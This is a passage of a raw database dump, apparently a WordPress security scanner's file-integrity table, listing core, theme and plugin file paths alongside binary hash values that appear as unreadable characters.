���tV�','',0,'?'),('|m�1\0��z�^�m�{�','wp-includes/css/dist/customize-widgets/style.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�7!h�^9�@(�TסG','sl_��cژ�_O�I�O8�4;��2GP�w�ت','',0,'?'),('|�3�=#zJ;�$�O�jh','wp-content/plugins/redirection/matches/user-agent.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���Y]��E�J�','5\"��y`�\0��byY5�mv\'��B\'\\�','',0,'?'),('|�� �4�x�\\��M�n','wp-admin/js/code-editor.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��D&fAД��E��~','{���h;[�5��0`	Vz��Kd�����^,h�','',0,'?'),('|��T]��:Y$=\'h�','wp-content/plugins/wordfence/views/scanner/issue-wfUpgrade.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���{��4�o�V�\'','D�?#}$�e�w2�6#��0M�Ë��RS�L�','',0,'?'),('|��Y�>��	�Ɔ�','wp-admin/link-add.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','E�!\'ljP��^kI��','�5:���q��φR_\\y���h�\rLIl���','',0,'?'),('}ĉ=�t�����','wp-includes/images/toggle-arrow-2x.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','F���\\����CDr�','-��N������7~@�}�_�=���V�_@A�','',0,'?'),('}�aX�]���D*I','wp-includes/blocks/file/style-rtl.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��\'�dlɶ��\0��|�','f��ed�m4@�@��j��`�VM�fƆ{���','',0,'?'),('}O� !ٶ]�O�O[�','wp-includes/block-supports/typography.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','48�����]&�f�','z�7f���!�Uc�����AB$��Ө&0�CE�','',0,'?'),('}\\�5�\r��$�l�W���','wp-admin/js/tags-suggest.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�p��D��B�aB�*','$Y�Xx��93%��ftC0y�,�^���\n','',0,'?'),('}`��g\"P�2��V��','wp-includes/images/spinner-2x.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','1����2��^#�8��','��#�˒�=$c��6�����	B��4�6','',0,'?'),('}|��\0+�N�6]��R','wp-includes/blocks/audio/style-rtl.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','K�X՞A�}��N�D]','�bbľ���$��Nt�i��W��K��S��','',0,'?'),('}��l�8�\\�;���~','wp-includes/blocks/social-links/style-rtl.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�y�ud4��Ųʗ��','��H{9$v6Y��Kf*Kj�{_��(��`/','',0,'?'),('}��-�$��L�H_R���','wp-includes/blocks/paragraph/style-rtl.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�s�s#�Ֆ�d��D�','m;�Җ�V��P]$�b�<����u��P����n','',0,'?'),('}�7 ޘ�DHD�Pl','wp-includes/SimplePie/Registry.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���\\���S8�X�`Yt','5\n֚�8��q�W��@��C�HҘ���\\eg','',0,'?'),('}�l}%CK�c}�NH��\Z','wp-content/plugins/wp-cerber/assets/flags/gr.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�f\0�$��*0B�֏*�','����,DZ��W?������l�G��k��Qq','',0,'?'),('}�Ȑ�\\L��`���i)','wp-includes/ID3/license.txt',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','GؐV%�P_��շ�','�I>��a�*R8?�)�p1�U͔�?2�=o��','',0,'?'),('}����=\"$�x���','wp-content/plugins/wp-cerber/assets/flags/si.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','����E����z|9�','��ո�����	+���}x͐�侟�?#���','',0,'?'),('}���{RҢ���\"','wp-includes/default-constants.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','����f\n��G8��','��/�R�5ڍC,�i�K�f�}���\\4/\0��','',0,'?'),('~Ⱦ/�m�ր�!��','wp-content/plugins/wordfence/views/dashboard/options-group-dashboard.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�s�X]�[sC>�Q��','�>��_c\ZJ+�����a��������Umv)�lg','',0,'?'),('~��\\��_b�$�-��!','wp-includes/js/jquery/ui/selectable.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','!9�qf��H7�{B,�z�','W�b��v�(��F4��S�]���@Ĕ�ܾ�','',0,'?'),('~ A�@�[�����','wp-content/plugins/all-in-one-wp-security-and-firewall/images/shield-info-icon-36.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','W�@�C�U�h�R~\\:','�^\Z�g�(�p(\n��!\"�ͭBy�E\"3;σ�','',0,'?'),('~?�J�I�b*׺�e�C','wp-admin/images/resize.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��lN������','�6󀏸��&?�5��?s�qGM`P;','',0,'?'),('~A�H�g��KT��','wp-includes/Requests/Utility/CaseInsensitiveDictionary.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�g�j���h�^\0��{�','o���\r1d._��f/�7q�A�E����','',0,'?'),('~F��㫎>dy��j�','wp-includes/css/jquery-ui-dialog-rtl.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','u�+x)���A�v6@�@','�/��N��e$�������2:.�}b#�K}','',0,'?'),('~V��Xa]�7p�|R','wp-includes/class-wp-post-type.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','1$�%�:��I�:��','P댭���t\\V�ܛ&��T���\Zݝ�^6�','',0,'?'),('~i�I�;ݭ]�A��S','wp-content/plugins/wordfence/vendor/wordfence/wf-waf/src/cacert.pem',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','54��⓿�`�����','D��Oo;o�O]+�\0���5�]/\"�޸&�Q�','',0,'?'),('~q�IP�I���r��','wp-includes/js/dist/vendor/wp-polyfill-node-contains.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�eY����۬x2���Y','���g�Hn����~<�0^Ff88���.%x8','',0,'?'),('~}�{ ��>D�}�<','wp-admin/css/code-editor.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','0�3�;�7��v:�P���','JlA��Z��q��F�v�<3�I^��k�','',0,'?'),('~��ReOX�f2��`�','wp-includes/class-wp-post.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�;@A��[�oh�́F�','Bms������AKE)(|-�c����ϡ�|��d','',0,'?'),('~�C0��2�3*���J','wp-includes/blocks/more/editor.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�I�*�b$���|��[�','�s8�1ŋ��KX+�<:ƽ>Z{Y�Q!�����','',0,'?'),('~���*޿S�̙e�','wp-admin/images/freedom-3.svg',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','hT�zC���w5�6� `','����|ˇ3��d���˪�|�`ݢ7�\r�8�5�','',0,'?'),('~�Pf��ԩ~1�LYw�','wp-includes/blocks/button/style-rtl.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','0^�9pDR�2|�n�ҽ','�P�%v��v����{�0�߃4���/�@�\n�','',0,'?'),('~ť�s\0�1y�$�L}h','wp-config-sample.php',0,'~}��!������y�','~}��!������y�','���R@-�ێx�}nm�O7*]���%�R���ۇ','',0,'?'),('~�Ӹbc��\Z$�@$��*','wp-content/plugins/wordfence/vendor/composer/autoload_real.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','+>r*������mI','E��\0�.�����¿¯�1F�(Df�u�v��˔','',0,'?'),('~���F������:','wp-content/plugins/redirection/locale/json/redirection-fa_IR.json',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��z�<r����]�i�','8���$�5�b`�v���\\��ྟY���Z�J','',0,'?'),('�ldK�м����','wp-includes/js/dist/components.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�z�G�t���Z&���p','F£F\"bhq�W[A�)�;!�ΊrO|\"���;','',0,'?'),('0u�R��D��{�1�','wp-content/plugins/wp-cerber/assets/flags/cg.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','o��K����*�A4�@T$','��Ŕ���wEi�av�A}z�[ɵ�7�6C','',0,'?'),('6\0�O�kvzfTN','wp-includes/js/jquery/ui/effect-fold.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��}:h�B�կ}z�x�','�����񀨯n�\r�S�/<���b���ե]Na�','',0,'?'),('6����f$T��g\'<','wp-content/plugins/redirection/locale/redirection-de_DE.po',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','F����7���dI�','�L�M���ILip�A�b>��-(6,zo��@���','',0,'?'),('@�={&����}�_','wp-content/plugins/wordfence/modules/login-security/classes/controller/ajax.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','=Ơ���H��xߗ�5�','�\\�f)�f�&Bx��j�E#]u�-e\"y6���','',0,'?'),('c��J�w��eIO�Iq','wp-includes/blocks/cover/style-rtl.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�\0\nsɁ�WR�w�=�D','�o��k��g�ͷ�3U\\-r%����2i���','',0,'?'),('j&��^���b����','wp-includes/ms-settings.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Ĉ�L�@�r#�}S���','4n-���J���2����T�hߕ�!�_H/Z\"�','',0,'?'),('j^��SN�-O� �','wp-includes/css/dist/components/style.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','h[]�d,����S؝(4','@w������.�Bq���2�>hbTG����ؓ�','',0,'?'),('p��kA�h���ZM�B','wp-content/plugins/redirection/locale/redirection-lv.po',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��.������ۜ$Q','&)ݡ;�5���2\"�!����P5t����-','',0,'?'),('tS�\"��lZ�c��Q','wp-admin/js/auth-app.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','qi����~[�|\r�S','A�|f��K�\Z���F|���eɠL�e��ܬ�49','',0,'?'),('w�R1�[��P�B���z','wp-content/plugins/wp-cerber/assets/flags/rs.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','����H]��el_L�S','9qp���p~##�7b���o����/�j|�bLl�','',0,'?'),('w�\'�Pe��F�+��V\0','wp-includes/Requests/Proxy/HTTP.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���)ϕ\\�^��$���','7gy\Z��]O��Y�T���b�Pǚ昁��','',0,'?'),('�m{8���]�ך��<','wp-content/plugins/wp-cerber/assets/flags/de.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','����NJ&z\\ҿ~��i','�Ū3�J��:2;��;�����p�J�kL~�','',0,'?'),('��%G]f�@�%�Z��','wp-content/plugins/wordfence/views/common/section-subtitle.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','n^\r��#f��st��W\Z',':�taQE�&͜�����s١\nGb\\Z S1{�','',0,'?'),('�СqD֚?�i�X','wp-content/plugins/wordfence/vendor/wordfence/wf-waf/src/lib/utils.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�%*(��<r���K�W;K','E�߬�!,y�3��1u%�T\0�Ӥh���ăi{�','',0,'?'),('�K�Q�}U&;&���Q','wp-includes/meta.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�����=�&�`B~˹','�/՜v-��iF��Y$��+�:�zD��ɞ�','',0,'?'),('�tr�εF_� ���','wp-includes/js/wp-emoji-loader.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�ͮkM��}O&#�6','��̶\ZM�儝`���+\0,��\Z� ��X�F:','',0,'?'),('�͍�����ρb�B','wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Core/Ed25519.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','|DZ(���r��q֧#','�)0������+���^h��v.(��>����','',0,'?'),('�N�cɉᯊ��','wp-content/plugins/redirection/models/url/url-path.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�{���iܟ�;�','$U@��~����a��-8&=kp;�����','',0,'?'),('�3-�����f��\n','wp-includes/css/dist/list-reusable-blocks/style-rtl.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','n=���S�͍n���',':�c�-y��O�wq\n�;��u\n�E�S���	','',0,'?'),('�;��!1�>�Y�xQ�','wp-includes/js/dist/block-editor.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','V��t;���N�\nPS�	','Nsd6�q㫫�	�q��L�S[٪>��]��','',0,'?'),('��ah�#��8�c���','wp-includes/js/tinymce/themes/inlite/theme.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','4O��DIc`��EJ','p�v�T5Z>j��j�\0\0��f��xa/g=�&�','',0,'?'),('���r=����c���Mz','wp-includes/js/dist/is-shallow-equal.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',',�ܧ���Z�����','�Oh��ҹ�&�j�^>E�]\'���T��C��~j','',0,'?'),('��nԁEO���Y�™��','wp-content/themes/newsmagbd/inc/theme_function.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�\\�e��㈘Og�΅�','s�XM��޷t�|=�ӇX����(W�O	j��(','',0,'?'),('��ں�u���M���[\r','wp-admin/images/wpspin_light-2x.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','mS������y\"C���','��66S�X������6O}�4>�p�\"���\'1','',0,'?'),('��Nx��ډ\Z�8yH\\�','wp-admin/js/theme-plugin-editor.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��\n��9�ߠ�%��','K����À5:Y�>lŜ����}��>','',0,'?'),('��sSk�i�<4\'c�-6','wp-includes/js/wp-embed.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','#�N�O8L^�sWkJ�<','�� �E��>�@_�0���!�B����5','',0,'?'),('���e��97�aJS','wp-includes/images/smilies/icon_smile.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��3�.)�2���p���','ˠ�\",�Rʨ�Tr=�o��r�З:����','',0,'?'),('��XQ���d9r�ڼ��','wp-includes/customize/class-wp-customize-themes-section.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��T��vl��3��','�,V���3R�w���.���\r׭+4ݦ`=�`R','',0,'?'),('�45���� -�rS�','wp-content/plugins/wp-cerber/assets/flags/kz.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��0�OC��tЛ>��i3','>ū�[h@H�X���X���Ո�k����55gD�D','',0,'?'),('�el�5�s��E�úQ�','wp-admin/js/media-upload.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','9�5�.��4�ԝ�Ξ','�����ڦ\'�D�\Z�� v��0��E~��b�','',0,'?'),('��,CUU����9i-','wp-includes/css/wp-auth-check.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�%��L��ԥ|l\"��','�]��\"8y����;��=X\r����Y�$��T;','',0,'?'),('��i�\Z!�[�8$\"�','wp-content/plugins/wordfence/vendor/maxmind-db/reader/LICENSE',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',';��8e_�T��ƽW','ݬ�IS�P\"�a�� 7J�6�QSv���_��y�','',0,'?'),('������J>Uv�0�','wp-content/plugins/wp-cerber/assets/flags/kp.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�Ze�+j�U+���]','���ĀN��ɳ���2�.�@+-���YzI','',0,'?'),('���~\"3�f��Bc��D','wp-content/plugins/wp-cerber/assets/flags/mm.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��CNU�����2t�J','�$�5AK�`�?w{�\'��5��0��2?II`','',0,'?'),('�ȉV?	��]�)A','wp-includes/js/media-views.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','7�T�Rw��6�U��','�m-�?��/��~�i/��TE0wm�M����','',0,'?'),('��`h�NkO�N8��','wp-includes/blocks/file/block.json',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',']�砂8�X���@Q�4�','(��{��tC���U�����0�˟>�`!��','',0,'?'),('���W���=�ԘHd�z','wp-includes/class-wp-site-query.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��f�u��a�)��X1','�<����wU��L�d �{���f��Sp=p','',0,'?'),('��X����-�4�J�_�3','wp-content/plugins/wordfence/lib/wordfenceHash.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','J\"����MJ�7Y(\nAj','�+�#>�9˖��9��?,ox���Q�N:��','',0,'?'),('����\'>�[��·�','wp-admin/js/user-profile.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�k�Ո_v�h�ɸ�','��ÎIQ��?�eg�6�D.�9͵%/j?','',0,'?'),('��a\'�0�E�\n�j��','wp-content/plugins/wp-cerber/assets/flags/az.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�dj�CO#M�P4`jz�G','=K���LJ���v͎��\ZG詋�3��z�6','',0,'?'),('���Pd������c�3','wp-content/plugins/wordfence/vendor/wordfence/wf-waf/src/lib/http.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','r����s�?�K��1\"','�Ĩ:E��kE��N�k\rFO>\"gvP��\"@��','',0,'?'),('�O�X�g]<f@�','wp-admin/css/farbtastic-rtl.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�S@��[�\\,�3|��!','�Sm�\'�;d`��e�M�0i=�?>����?{','',0,'?'),('�3��Ƈe�(ú9�','wp-includes/js/jquery/suggest.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','s\\+A)���n.;��','I<�{\04�`��<!j��Z8돲��D�HW��','',0,'?'),('��b����N�8�hk�','wp-includes/rest-api/search/class-wp-rest-term-search-handler.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��cW�U��ԟ�`B	','w�\r��j�*�m�l]� �t��PU�\r�E��','',0,'?'),('��\\�(��wB��I�','wp-admin/network/update.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','l��	ΒRU;�pp�b�','��,�!��m4f������NR�\n���B��^','',0,'?'),('�$�+K71�y(�F���','wp-content/plugins/all-in-one-wp-security-and-firewall/classes/wp-security-backup.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�`{m�7�����I','��M^u�_Q��]������\n�Y�����','',0,'?'),('�(tTlDά7&��MP.�','wp-includes/js/tinymce/tiny_mce_popup.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','B7�I1�0�����d�','���\'З��/!\Z�a!�~�)��1D��','',0,'?'),('�/	�E:K�R寥�v�','wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Core32/X25519.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�V��[�SPk�C�','��ںم�Ŵ��}C:�ø=�~��Q�(8��$Q','',0,'?'),('�@�F �Ӡ(���e*[','wp-admin/js/theme-plugin-editor.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�-J�~�������','� |�D�O�?{��ٿ��%��ז�Y}��О','',0,'?'),('�B��ه�v<Sv稳','wp-includes/SimplePie/Parse/Date.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','N\\�O2�����C[\nջ','�=��<��ei|�M�qZ]V[]&I-q9)g�0','',0,'?'),('�F� �GJ��B��s7�','wp-includes/js/media-models.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�=紮�^��~���\r','��uw�&ֵ�Q�\Z��qL�F�▐*6�','',0,'?'),('�MȮs����%}�+=�','wp-includes/blocks/latest-posts/editor-rtl.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��k�?���!֤��','�^�x��2\\�f_��(�A�o�֦��&I��b','',0,'?'),('�W= \\\'x\"�W��}��d','wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/namespaced/Core/Curve25519/Fe.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���թ�K���^㥾�','�M�8:�naƋGZ�qQdý!����\'��&g1','',0,'?'),('�Y��ػ�甩���*�','wp-includes/css/dist/edit-post/classic-rtl.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�P��t�]�CY�Y@','W�gT�aWq�h�C�14��\'�j#����ջ�','',0,'?'),('�_��-�,�L^�]H�','wp-content/plugins/wordfence/css/main.1629122067.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','|8/�_NN���7�','pE(���4,�G�i�:��UML�k5�Y��','',0,'?'),('�w��5���)���','wp-includes/css/wp-embed-template-ie.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�)6��	؞мq ���','�o��+8]�Su�H.�C�g��R9�&�+���\\W�','',0,'?'),('��\0���+OW+�','index.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�m�]�#��N�X�,�','�Dz�\n�}_��7x,�9�t:��\'�\r����','',0,'?'),('�����A���1\Z�;�','wp-includes/rss.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�4|����e��(r',':��.,�0aH�A��\05:�f�s\nf������','',0,'?'),('���]�5�K���^\r�','wp-content/plugins/wp-cerber/admin/cerber-dashboard.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',';F�,:\r���#+�>',':pB�}�283�`	i�H�p���\Z�/ֺݛjd�','',0,'?'),('��{��h���B-o:Ih�','wp-includes/blocks/query-pagination-numbers/editor.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�h�?,Q?��B��1=�','�l��N����� Ж?SǷ����j,�h�T','',0,'?'),('��W�^�����T��,','wp-content/plugins/redirection/models/htaccess.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�%�RV�ۛ�lkMC�v','�s�T=k,��dś�$�\"Z1:�T%�\r}+ԇ','',0,'?'),('���v�A\nGr�3C9`','wp-admin/includes/class-wp-internal-pointers.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','^I[8T䍍�\\��=','Y^9�A\r+^-��iL�W��j��O���F��','',0,'?'),('�����[G�S	ԚZ�Q','wp-content/plugins/redirection/models/header.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�*������XZ���=','\'�R\\p��}s��\Z�db:F�ի 5š�','',0,'?'),('�\Z�R虒�<Fc֛;�','wp-content/plugins/wp-cerber/assets/flags/mp.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��4^�>!i��2D�h�','�k\"�z�ƽ��A��i�s\"A�ǽ��(\Z9','',0,'?'),('�Ebl8�y���}����','wp-includes/js/tinymce/plugins/link/plugin.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�*NȒmQ������','�`3�cYQ����9Wޭ#l���p�S+G��4','',0,'?'),('�W�nJ�.\'/x��','wp-includes/blocks/embed/style.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','����P�#����}�5#','�f2�I���\\�V�sb�Z��efA���','',0,'?'),('�m>�\0��0X&�^�Q','wp-content/plugins/wordfence/vendor/maxmind/web-service-common/src/WebService/Http/CurlRequest.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��pKz��`�)9_@�','��aғYe�q�7YTc�Ȋi$�W�ت�/�!�,','',0,'?'),('��?���z6���aDz','wp-content/plugins/wordfence/images/loading.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','K:�����m𙗣P�','j*�e����doX�~�7��&���N�9�|L���','',0,'?'),('�и+:3�XnN�tex�X','wp-content/plugins/wordfence/fonts/roboto-KFOlCnqEu92Fr1MmSU5fChc-AMP6lbBP.woff',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�����{W�7h>���','�	2m��w��3�)zWg��v{Af��Hu`Co','',0,'?'),('���ʆ��n�D㮖�(','wp-admin/css/install.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�B���/*�����zM^','���-9�4�<0���]lsS�ď��<I����','',0,'?'),('��j����5��f�j�','wp-content/plugins/wordfence/views/tools/options-group-live-traffic.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','!��L|�y+5*�M\0Qk','�����O�q��Fri���e�+�K�	�/;C','',0,'?'),('�)ũ��2[�	�4�_a','wp-includes/class-walker-category-dropdown.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','m��s�ny�ld�)��','�ՠ���P)_�s�)v]��Չ\"����|�','',0,'?'),('�+o�2��8�E�+K%;�','wp-includes/PHPMailer/PHPMailer.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�q�\n�L�)��8�','�GK#I:�4ڄ`��\'�x�ժ\\���_இ6�','',0,'?'),('�:+[��g��CZ���','wp-includes/template-loader.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�z�	ҿ��܌~���','��\'4�h �䱺��[����E��%��J�H�','',0,'?'),('�H�F���I!���M9','wp-content/plugins/wp-cerber/assets/crb-logo-vn.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','j��h��%t�J���','�Q��6�������V���\0\r��M�9��','',0,'?'),('�i2O�׍��+�s�X.�','wp-includes/js/jquery/ui/core.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','PC��\r�{�tk�\"x',' �S�����3~�n�F#�EHf�_��7qY@I��','',0,'?'),('���P���M�˝�=U','wp-content/plugins/wordfence/views/dashboard/status-payment-expiring.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','ʿm�\\m10��f*�)','	m��Y�_����\\\'.��]���WyW0��0','',0,'?'),('��>ݶ�����߁��','wp-content/plugins/redirection/database/schema/400.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','T�!	\Z�A�[4�\n�','�F5J��|M�[���,�K��b�(�5Ҏ7�.n','',0,'?'),('���e��-\n�yV','wp-includes/sodium_compat/src/Core32/ChaCha20/IetfCtx.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���|�Ww�b>E��yJ','�\'�����~�6ȝ\nB���agz���d��Q','',0,'?'),('������PU��ac��','wp-includes/sodium_compat/src/Core32/Curve25519/Ge/P2.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�YA��G=b�u���','z�,ͥ���t	<{@Y{�iy��s���c�(S�L','',0,'?'),('��nv��Z�YV��','wp-content/plugins/wordfence/vendor/wordfence/wf-waf/src/init.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��x9S���\r�u�>',')6�H�$�/�j2m���O�o�<4�v)�giAp','',0,'?'),('��J��\Z�W��o','wp-content/plugins/redirection/database/database-upgrader.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','����ݜ�d�v�','Z�Z̨�3Sε�6b�Z�o�E�s�8�Ü�Ď�','',0,'?'),('�Z��D��l�=�컫','wp-content/plugins/wordfence/views/waf/waf-install.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�]oFo�O�\"I�R��','�L�H�?-Z(G	�I�L��L�Dν\Z�����۲|','',0,'?'),('�1�`��B���¡]�s','wp-includes/css/dist/editor/editor-styles.min.css',0,'�/Ow�:#��v���\r','�/Ow�:#��v���\r',']��Ɇ���m�{�w��#ߟ^��,n����,>','',0,'?'),('�B%v6�I\"Jb��4ӡT','wp-admin/link-manager.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','B�0iNj�����','�Lo(��m�ؾT���k�%<P!w�/\n�','',0,'?'),('����I6���F�','wp-includes/blocks/rss/editor-rtl.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','D���\0!!i��','�u��\r�>u`�37(�F�^� �)L�}�(�\"l','',0,'?'),('��>�A�B�7�Sz!�e','wp-admin/includes/export.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���H?���i��VJ�Ű','�^��AGx������z���<�I��K=��H','',0,'?'),('��|0���O�+�]lU�','wp-includes/js/dist/a11y.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\'h����������(','��\"�Y\n+�,�U��2����[�-Q���','',0,'?'),('���T�양�:t[��','wp-includes/Requests/Exception/HTTP/410.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','!�$�-4�3R�ۢ�U�','��9�f/3MM;#GڪWO&�tS�O\Z���Ƙ�','',0,'?'),('�65\nN���x/\0���','wp-content/plugins/wp-cerber/assets/flags/mo.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','����aM7-�VD��%�','��K����v�FI���ۨ�0g��h�HV�R','',0,'?'),('�)����Yh�.�;��š','wp-includes/Requests/